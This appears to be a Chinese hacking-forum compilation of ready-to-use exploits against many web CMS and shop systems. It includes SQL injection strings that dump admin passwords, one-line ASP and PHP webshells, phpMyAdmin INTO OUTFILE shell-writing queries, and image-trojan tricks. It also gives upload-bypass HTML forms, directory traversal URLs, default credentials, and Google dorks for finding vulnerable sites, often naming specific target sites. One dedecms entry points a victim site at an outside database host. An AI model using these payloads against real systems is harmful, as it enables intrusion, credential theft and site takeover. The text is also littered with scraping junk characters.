启航企业建站系统 cookie注入漏洞通杀所有版本$ q6 U C3 ~+ n( ^; e, r7 L
2 j* m, W) f* K直接上exploit:
& z% h/ ]9 X3 wjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
" Q& h6 M5 g# a x3 D# @% K# [test:http://www.tb11.net/system/xitong/shownews.asp?id=210/ V+ j9 a8 ~* C! S" x
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& c# f. f5 C! Y5 ^
Asprain论坛 注册用户 上传图片就可拿到webshell
8 h) C: t# H8 S! e$ i# f& e& G% z. G6 |4 v# q; y
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。% e4 k( Z6 o) Y7 M( c: Q. S3 {
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
8 f, X4 y6 s/ X2.gif 为一小图片文件,一定要小,比如qq表情图片
: v. u8 r5 \5 T3 _8 l, ] K3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用5 J' f( ?8 e3 V9 s9 D
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
6 p% l' X4 q- s) c. P5.q.asp;.gif
4 }" {7 W7 C+ T8 m. ggoogle:Powered by Asprain7 O2 m$ a* i* T/ f( V' ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 Q7 l4 P/ K8 M& u8 j
8 l, h( Y0 t2 d" _$ lShopNum1全部系统存在上传漏洞。
& h7 x3 ]: P3 r9 \' g+ Y' C- S' X. i& _: r3 Y8 e4 Z4 A U. G
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。" f* H" b7 Y z' ]9 X
按说明 提示登录后台。。; S! A: x9 R# F: d; ? ^) L' U
在后台功能页面->附件管理->附件列表
1 n8 `! q' `& A! O/ S: W" o可以直接上传.aspx 后缀木马
* z, @4 e8 l9 {1 T/ \4 c6 Zhttp://demo.shopnum1.com/upload/20110720083822500.aspx0 c5 V& T* z8 W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& U( S. I5 X+ @' |/ m, {* d$ _# D
$ o! a5 p" o X2 `& V) n牛牛CMS中小企业网站管理系统 上传漏洞
9 _& m0 p0 Q5 ?1 a- u& \8 q: A: L) c6 o2 V% a) f P& K: L
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
& E. H" u5 s m F后台:admin/login.asp
; r# F! ]: ~8 g: @ewebeditor 5.5 Nday3 b q' I5 S, e- C
exp: D ^: b1 w: J9 t" E- B; Q: i! c
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?5 W) l2 l1 m7 o1 Q: W6 w. }
<input?type=file?name=uploadfile?size=100><br><br>?7 s+ G/ i0 L. M. R K; ~# K
<input?type=submit?value=upload>?
5 G4 c' @ |0 P+ s- T, c, d: z; H</form>4 f, Q7 v- i2 K+ t. ^2 t! X' h
ps:先上传小马.
! e1 p9 |- H- U" [inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
4 w# @& @/ k7 K% @8 Q' q- e9 b' g8 ]
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& I* T9 I# m; u* U/ d9 h& X3 @6 w
0 w- F" P1 _4 k7 j* y2 VYothCMS 遍历目录漏洞! k i+ ]' I4 H5 T
, U, a: s4 E2 _% n" O1 u0 n优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
. G1 e! n9 I5 P& n M默认后台:admin/login.asp
4 h, e ?: F# t* r# u4 G遍历目录:
8 @) b7 S& Y! }4 R V( mewebeditor/manage/upload.asp?id=1&dir=../
: U7 T: L. s" bdata:/ T+ Q2 X9 ~ } ^
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa3 f9 O% P j, K A
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( h7 h( ]4 E! I, H- z$ }9 v! H
; a$ n9 }' z3 ^$ N( c
Net112企业建站系统 1.0
' h; D& A0 t0 M1 H; e2 b* K3 Q3 k
. G$ W( g c9 R源码简介:
( j. I& _' i3 C' A0 ONet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。: ~& O; h% Z4 M( Y
添加管理员:* Q' M: F" M1 J# N( B5 ^
http://www.0855.tv/admin/admin.asp?action=add&level=2
; T2 @. d+ S+ r- C! K其实加不加都不是很重要,后台文件都没怎么作验证。
7 i e- ]. n3 \; w6 w- y上传路径:6 q1 Z+ d1 Q! Y
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
* Z, v5 @$ p: ^& f* Shttp://www.0855.tv/inc/Upfile.asp?Stype=2% A4 O+ i# i: w7 O8 h
怎么利用自己研究。
. S$ y2 o0 y" D" N遍历目录:
& Z& u8 x' z3 _% X7 b/ A! Rhttp://www.0855.tv/admin/upfile.asp?path=../..
( |' T: y ?' F( N如:. B0 G& c% v0 R' T% R0 v, P
http://www.0855.tv/admin/upfile.asp?path=../admin
- r& l3 n' ^$ y; |7 Fhttp://www.0855.tv/admin/upfile.asp?path=../data
* x& T9 W3 g. p) d. _( j% o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 o# p; W+ u; N. }" L& e. U8 U4 E* r# ^/ G; a8 {- c( f. E
易和阳光购物商城通杀 上传漏洞+ y+ @+ M! w! H4 x
. \9 w( P; ?7 y n5 ?/ l# D
前提要求是IIS6.0+asp坏境。& J7 ~$ a. ]/ V0 N" k) ~4 _
漏洞文件Iheeo_upfile.asp
1 T$ ~' q0 d! k过滤不严.直接可以iis6.0上传
- K: K7 g0 g( s7 \0 o把ASP木马改成0855.asp;1.gif
" {1 s+ [6 a$ `直接放到明小子上传
7 r& h* G) R# [8 i3 [Google搜索:inurl:product.asp?Iheeoid=7 b8 f2 ]& d. x' |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- E; e+ M* U3 \, T8 N& P/ d" d
# g& h9 ?' f* a% s2 t a1 H
phpmyadmin后台4种拿shell方法
1 m% K( L' `* p' p9 y
/ _8 w0 d: [ R1 d5 [方法一:! f4 f5 F7 d8 h( m
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );8 g( c$ H7 D- u2 B
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');2 B o* n9 o+ }1 n/ C! I! k
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';( y( v) f" n. l: n
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
& I: ]; n& j) {, w一句话连接密码:xiaoma
/ K) W8 X* q) Y t# F; V$ n8 K方法二:+ ^* E/ R: k9 P4 x) X
Create TABLE xiaoma (xiaoma1 text NOT NULL);6 r1 G, N+ |- d0 j l' p
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');$ }; ?2 K+ @, S+ w [. k
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';: z$ w# ~5 J: a0 ]
Drop TABLE IF EXISTS xiaoma;( U. B1 `0 T! P; J i( P3 ^
方法三:
$ G# p$ |8 {( R* ]# V% p读取文件内容: select load_file('E:/xamp/www/s.php');) V' e( e4 J) @/ J+ r
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'% H& r! Z! N' B& X
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'8 C% }& J, A5 c0 B, E! \/ c
方法四:; ?, f G7 n3 J. s" Z5 b
select load_file('E:/xamp/www/xiaoma.php');
% E6 o( u( q) z+ Q, d1 Vselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
q8 {" ?# k/ b9 O- e& }然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir. Q7 x& Y( s+ `. j. C% G
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 u0 h+ d3 Z7 U
. T! j2 O+ O9 C0 z- N# T6 m传信网络独立开发网站源码0day漏洞) V9 L% i+ Y' [* e2 W/ T8 d& i
8 i, A1 U$ i/ Q ?
后台system/login.asp7 p* @: A. t' F1 o5 o: |' f" {& ?
进了后台有个ewebeditor
! j6 ^* D: B- Y2 r7 G5 YGoogle 搜索inurl:product1.asp?tyc=
6 N# m1 t+ y& @% U# [8 i编辑器漏洞默认后台ubbcode/admin_login.asp, ]( x# X4 y' E% _
数据库ubbcode/db/ewebeditor.mdb6 m' p4 A" R5 P2 z: a8 G
默认账号密码yzm 111111
5 k ~( `, k* D- [: F
8 d2 W C( ~: ` \& w/ g拿webshell方法
4 \" C/ d S" s( K( @- ^; [登陆后台点击“样式管理”-选择新增样式 2 u( _5 g+ p# Q5 Q! \/ g$ P9 M
样式名称:scriptkiddies 随便写 " k4 y( J% P6 i
路径模式:选择绝对路径
# ] {/ \: m; \( I: K图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx, s% i" }9 z7 e! X
图片类型比如就是我们要上传的ASP木马格式4 @, N' m$ J. u# o" O$ x' j
上传路径:/5 M2 V% I0 e! k' r$ Q/ q
图片限制:写上1000 免的上不了我们的asp木马- l( [* g5 [+ h+ R: Q
上传内容不要写
, P! U( b+ }7 o; C& z可以提交了 . O2 J x" ]6 k( y: b d
样式增加成功! _6 }9 u& V; E& A
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
! z- s3 a$ F! p5 [( }按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置! [. N3 L; a) J, p6 @
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
) p$ g, {. z- P3 @! u上ASP木马 回车 等到路径3 ?6 A/ @; v# X) s
' c7 B. {, Z4 A9 s5 h% C* ^后台:system/login.asp
' t0 V9 H0 |3 o$ kExp:
$ n. J& d0 H# E& P: ^; P6 D% G0 [and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
7 j c m: n$ v4 W: i% u测试:0 Q* J( d$ y9 [' F" p9 Z8 w" J
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
1 y( E* u0 t: O3 P8 Uhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
6 Z1 ?# s Q9 Y4 ~, a- E--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) ~( e5 ~- E- a2 h
4 L6 q4 H- ^% a9 N# K6 U j/ y7 Dfoosun 0day 最新注入漏洞/ S# ^4 ^1 `! E3 m# v) [
6 Z# l+ T9 _& {% F4 X
漏洞文件:www.xxx.com/user/SetNextOptions.asp0 s% F$ F- w+ r" h; G5 T# l
利用简单的方法:
X# g" r7 i8 z暴管理员帐号:8 X8 \' J6 g& `2 O$ z8 v
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin; _+ Q& I5 F* p# C+ o% S. z
暴管理员密码:+ R& P4 `: @+ j& j, c; o3 W/ n
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,4 z2 ]& D3 D5 o3 Z7 E; q
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------* n& f0 U) A& C1 r2 m2 h
6 F# |9 M5 ~, d网站程序的版权未知!
! X' L0 h5 A3 k) G3 L3 h" l+ n- a: ?* ?: o% h6 G e( m5 s) e' }
默认网站数据库:" }( }3 E& f. N0 E' n
www.i0day.com/data/nxnews.mdb4 z5 M/ g/ b1 d( ~
ewebeditor 在线编辑器:5 f+ z, P" V6 a$ A* x, D
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb6 l3 S7 N: a0 Y7 V& l$ |
登录地址:ewebeditor/admin_login.asp
: m+ W; I2 ^, y5 i' A默认密码:admin admin4 M: z( ?7 Q1 w# I) ^- J. e T6 k
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
5 \+ Z( u6 _2 s( V3 `5 z; L5 \& k" t2 V: D: O/ v) \
Sql注入漏洞:
' ~2 C: J* v/ ?: g( j; [http://www.i0day.com/detail.asp?id=12' p/ @, k1 R2 y/ Z S2 Q
exp:- H! U& M6 y8 j" b: n8 M P
union select 1,admin,password,4,5,6,7,8 from admin6 f/ S; U% f S' P$ T" y# d- W
爆出明文帐号/密码' n7 ?( d* C9 q* q3 y* ~
* U. h- E, g8 K; Q
上传漏洞:! L4 Q0 S& E ?- P# O
后台+upfile.asp
4 Z( u q5 x4 ^( @! l如:
% X/ h* {6 Z4 A4 _' ?5 ~) Vhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。' ?# w# E2 ]5 m6 K, ]3 w& q
shell的地址:网址+后台+成功上传的马
% R: P3 r+ d- _; z0 Cgoogle:inurl:news.asp?lanmuName=
5 O$ B8 [6 w7 Z6 w0 T6 q9 S2 u# }0 b------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 D) P+ d1 D0 l0 d0 I( U Y
* _$ a2 } |3 A& Ndedecms最新0day利用不进后台直接拿WEBSHELL
' `+ z- u( Q! I. n- A) |/ u2 H) S, h0 n3 ]& \; t
拿webshell的方法如下: d$ ?0 c) v) r, J' X' a
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.( S- Z6 }5 L* O. B
前题条件,必须准备好自己的dede数据库,然后插入数据:
* N/ F, k1 {. _insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); ' H, N& p% A7 Z
- s' C* e: o; J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。+ I. v/ ?& G7 g( f/ ^$ z
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">8 ]# z* I) v- @
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br /># o7 d. l$ L1 `
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />$ A v3 P' O, F3 H3 x
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' C8 ~2 a/ B/ N' @' q3 u
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />) ~# j/ f6 y! y% O8 h
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />% k$ |' X% z' n; M
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
% r O9 M* C. ~' ]3 O- j/ R: ?<input type="text" value="true" name="nocache" style="width:400">
" G Y% R0 a/ J<input type="submit" value="提交" name="QuickSearchBtn"><br />, a7 u- W7 q3 |9 e. @9 ]9 x
</form>: z6 n" x& k0 ], ~2 p* }
<script>$ m0 `6 Q; p- p% o W$ L
function addaction()
+ s; M! M; V3 Z9 o7 i{
+ N! i2 \, C" N4 `document.QuickSearch.action=document.QuickSearch.doaction.value;
- J% T- x, w" R& l}
7 a5 D+ f$ b* B</script>
! q' B+ _# e# T# e! o-----------------------------------------------------------------------------------------------------------------------------------------------/ g8 b9 k7 s5 B) O
2 j' }; ?# s S0 [dedecms织梦暴最新严重0day漏洞
; E( P( ~1 T% a' J" gbug被利用步骤如下:
9 y) K( q) ?5 \http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root, A8 \; G+ h$ f# r# u
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。 O, ^ x& ^" F f9 j( c
-------------------------------------------------------------------------------------------------------------------------------------------2 R c' u3 m, ~& r3 |) Q/ J: H
7 i5 M% g: f6 l5 R) A$ U% A多多淘宝客程序上传漏洞
% t% G+ m; |* u漏洞页面:
" z2 d$ O& J' [7 a0 V0 Qadmin\upload_pic.php
$ E+ X2 O) J7 U# j$ j! ?' s. u传送门:
' s& v Y: I( hhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1& Q8 \1 G3 g1 R0 }# p- c& N
PS:copy张图片马 直接 xxx.php 上传抓包地址!2 b+ N7 M+ W. x8 S- @# y" ~( M; h
------------------------------------------------------------------------------------------------------------------------------------------------------
! j% y' _2 f6 j, }8 i [; W! t4 x. z2 r# O' e8 p' P
无忧公司系统ASP专业版后台上传漏洞
" F. W; L4 ?8 [) }" H. A漏洞文件 后台上传0 \$ @; r* b' L( L: q0 P- j
admin/uploadPic.asp
% J5 a+ o. I. D6 F漏洞利用 这个漏洞好像是雷池的 R1 N: _9 |; D& Z
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
0 y& z% m) z. q$ C1 c5 |等到的webshell路径:
" k @) q) q9 t$ R, E. f7 a" Y/UploadFiles/scriptkiddies.asp;_2.gif
8 f* B. x1 n; j( O% |. F---------------------------------------------------------------------------------------------------------------------------------------------------0 s8 ]0 v) x# S/ ]4 ?5 ~3 l0 |" b
+ O: g! a/ G# R8 \6 U) C2 A$ F( j# b
住哪酒店分销联盟系统2010& W. Y7 ?2 C( @* K$ I
Search:
( L5 O0 Q3 N b* G! x, Z- V; {inurl:index.php?m=hotelinfo
+ D. ^: d Q/ Ehttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin% L/ q( ~9 q. _5 i% ]: t+ i8 x- H6 _
默认后台:index.php?m=admin/login% z t& c1 L/ O3 _$ ]7 R' H
--------------------------------------------------------------------------------------------------------------------------------------------------
: p6 z0 D5 P) q9 Y, B2 g+ w$ i Y$ `
inurl:info_Print.asp?ArticleID=
7 I- E8 ]6 `7 |+ W后台 ad_login.asp
8 j$ _; u8 I& f, E4 P& q. S/ i爆管理员密码:" Y9 p6 |5 d. r0 f* K# J2 r
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
5 e' L7 ^- Y3 c( E- J* |------------------------------------------------------------------------------------------------------------------------------------------------------------
) y' n: l8 o% Z [
; x" _! o9 M Q P1 {: F搜索框漏洞!* b; o1 K, |4 V. Q
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
s$ b8 ]* y* t) B# u--------------------------------------------------------------------------------------------------------------------------------------------------------
3 n- i& T+ t. @' ]7 i) K9 B7 J: z5 L- s1 w# |5 g6 i
关键字:# E5 e. r) e( D! L" R; `+ [
inurl:/reg_TemletSel.asp?step=2
( w9 x. |) b# W: m6 R9 l或者* b! U0 m" C: ?# Q
电子商务自助建站--您理想的助手! @$ f) E. e% p; _6 C, d/ A
-------------------------------------------------------------------------------------------------------------------------------------------------6 a7 p) E# d3 y+ s
3 ~+ b+ y& @0 G- j9 T- b( QiGiveTest 2.1.0注入漏洞
0 E5 g/ N! y% jVersion: <= 2.1.0
1 A1 |7 R1 C7 i. B! V# Homepage: http://iGiveTest.com/$ O& @9 a' a; E8 P9 F
谷歌关键字: “Powered by iGiveTest”
( B, `/ U9 `3 F% g2 [随便注册一个帐号。然后暴管理员帐号和密码
3 ^+ X8 f3 J$ G) Y+ m5 E7 rhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (14 w1 n0 ]1 u5 |0 u0 M* G
------------------------------------------------------------------------------------------------------------------------------------------------
( Q+ y/ M) |4 {4 c9 m& a
2 B S0 h! C; d" O- S! Z! w! OCKXP网上书店注入漏洞9 [. j) n, x/ s2 w4 [
工具加表:shop_admin 加字段:admin+ ?6 Z$ M6 f4 B
后台:admin/login.asp " |, d* s% o' ^" @0 A4 g6 x2 M
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
3 N1 P/ c& j" `" H8 t+ w0 ]+ Z' |inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息5 O2 `4 _( p! d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( N- H% W. W0 G
9 g, b( L) x) L. X! ? b段富超个人网站系统留言本写马漏洞
; W- o: Z# G% X" S. I源码下载:http://www.mycodes.net/24/2149.htm0 p( z5 z3 {, Q* z u: i
addgbook.asp 提交一句话。& z- ?* z5 v$ k1 |2 Z3 d- Z' l
连接: http://www.xxxx.tv/date/date3f.asp
- t9 W6 }* T( ?" `- f; kgoogle:为防批量,特略!
3 a, F, M* |8 X: d" b* }-------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ B6 @' I; n2 L* o1 C
$ R/ V. z+ Q" I
智有道专业旅游系统v1.0 注入及列目录漏洞
$ s8 t1 s- t; M默认后台路径:/admin/login.asp" a6 Q, X) v( v! A# w$ h# m9 Y
默认管理员:admin$ f* w' n) X0 P1 u6 D2 T
默认密码:123456+ u6 G% U, x7 u9 ^0 j
SQL EXP Tset:/ b3 G, B& Y3 u$ v. W
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
9 j" a+ A0 c' a------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% [6 j+ r: B4 z) f% e
7 H# }. ~7 Q2 y- ]4 `3 `' gewebeditor(PHP) Ver 3.8 本任意文件上传0day( ]! r6 ~$ V! V0 S- z o/ V
EXP:
% w2 C9 i8 W r' T7 K( z<title>eWebeditoR3.8 for php任意文件上EXP</title>8 _: x+ U! b" N6 T+ ^- {+ a
<form action="" method=post enctype="multip
0 W& V" E! {. E6 n: T" bart/form-data">
% m9 X1 ~% [0 w4 c, g<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ' u' J/ P& O! q
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 6 h$ i7 T' M9 W0 v4 B
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> : [8 S2 |% W* [( B. I( ~- [$ B
file:<input type=file name="uploadfile"><br> ' f8 O5 B! _2 o$ t
<input type=button value=submit onclick=fsubmit()>
# A* ^* X# A; W4 `' E</form><br> 5 a1 h! M: g3 ~6 b4 N5 f
<script>
4 u5 q- F8 Y L0 A. C4 Yfunction fsubmit(){ 5 c; q$ I3 b2 F' A1 Z1 r- [
form = document.forms[0]; - c% \ H8 M7 T- T9 p# I7 U' A
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
7 m ?- }# X4 h+ x! halert(form.action);
W! B Q; K0 a" r' \form.submit();
' F5 u" ]# O7 `: ^ s6 n+ E} z' k R" k& g, `
</script>
+ C3 s' c7 l3 j) R& k# I3 W注意修改里面ewebeditor的名称还有路径。# @1 v* p; V1 Y
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ G( o/ p0 f1 P$ v2 q. C
- f% t% D1 a$ w- K3 O提交’时提示ip被记录 防注入系统的利用2 E9 N5 w a# {- w4 D- T% Q- p+ H
网址:http://www.xxx.com/newslist.asp?id=122′
, k! `6 D9 S% J提示“你的操作已被记录!”等信息。3 C. k5 N! c8 H9 `
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。/ X: }2 S7 V0 ~& x
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( V( Y i$ u6 \
2 a2 b# i x- X: ~$ |; ^西部商务网站管理系统 批量拿shell-0day+ k$ y- d8 k) \( I3 i C; g! F& `6 c
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ' H1 w( Z% s$ }& ~+ K6 N
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛% X4 U7 e4 |" ~# z c* R8 j, s
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
! J( Z4 q: [$ X3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
' G2 B3 _5 t$ q; w" b2 O---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 r, Y6 ^2 H6 I8 t& Q6 [$ ]1 }
6 v: o1 t$ t+ q$ U8 ^, F/ T8 [JspRun!6.0 论坛管理后台注入漏洞/ t k) C. ], _9 ^) Y
" Q% B7 z% y- O. L' B
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
- K1 c" d3 u" j. [JspRun!6.0 ' M) T$ R. n5 K# b: }
漏洞描述:5 }! A; h, d. l5 N7 u" v8 y
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。, w# J$ y' P9 T3 L" b
在处理后台提交的文件中ForumManageAction.java第1940行2 Q1 Y7 `2 `: v9 N
String export = request.getParameter("export");//直接获取,没有安全过滤
6 z6 S/ o% [5 U0 ~# oif(export!=null){/ j% [/ \" D$ t1 T' {
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
: e" f& u2 i% H V+ y" Uif(styles==null||styles.size()==0){, M3 U6 L" f/ H/ F; r
<*参考
& W0 s4 x$ |- u; znuanfan@gmail.com
1 \0 S1 D3 V; J8 Q) T' f2 u! m1 s*> SEBUG安全建议:( H ~0 J! X! k9 U' x
www.jsprun.net$ W) S" a- F9 s, k
(1)安全过滤变量export
0 @4 h4 X) e5 ]- {3 r. `: w' G, F* D- a(2)在查询语句中使用占位符* I( M: L3 K# i0 m$ f
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------) [& n8 ?) I0 U3 i; c
, g( F2 N% P4 Z1 g4 C; f
乌邦图企业网站系统 cookies 注入
! r' Z% p# G3 K
! W8 [ O {- ]: a$ s: B程序完整登陆后台:/admin/login.asp
4 H4 v. X9 D# g9 `4 V' X0 ~默认登陆帐号:admin 密码:admin888: P, n8 T Y. x. J& v
语句:(前面加个空格)0 E3 W, P4 T" Y3 o! ^9 ?0 Y
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin8 `% d- n1 ?4 w3 R
或者是16个字段:
! s4 s9 I" G, t; O oand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin; Q0 Z$ O0 C5 j
爆不出来自己猜字段。' |9 N! M5 ?2 @3 C4 i6 M
注入点:http://www.untnt.com/shownews.asp?=884 O' F+ g9 _% I0 x+ r
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
0 f% X' I3 C; {. e# ?( J. a# d! T关键字:0 ]. G$ ?2 l6 \% I! }- t; k
inurl:shownews?asp.id=
' T" E2 n- O5 o$ ]. k4 e9 O; ^-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 J. b2 ~& r! p
, z% _5 W! [* h# R3 y8 Q
CKXP网上书店注入漏洞5 x, g Q1 k" g$ r: }# O
' R/ r- t* ]9 N. `: I
工具加表:shop_admin 加字段:admin: Y s' A. t4 O* U; W
后台:admin/login.asp
& M/ H! W# ~6 X, F4 v. Y登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
# K- U* h4 i+ L5 einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ ?8 x6 X4 z8 m7 M---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 ^% J) Y4 s( U0 l8 u# v S @5 c/ Y- u2 L! N+ N
YxShop易想购物商城4.7.1版本任意文件上传漏洞& J- G0 V: T- x8 K- {8 G
9 ]& Z( G3 j4 P
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
/ D" Y9 ?4 Z% q5 Q3 O" W& r* b跳转到网站根目录上传任意文件。0 u( N+ n5 D* K6 {" Z4 J
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
/ u) F: C6 g$ F- ?, m: f6 Q<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
: f9 Z9 K" |5 A& T% T0 W% cUpload a new file:<br>
0 J& w* p/ e$ c, u; A" p0 H<input type="file" name="NewFile" size="50"><br>
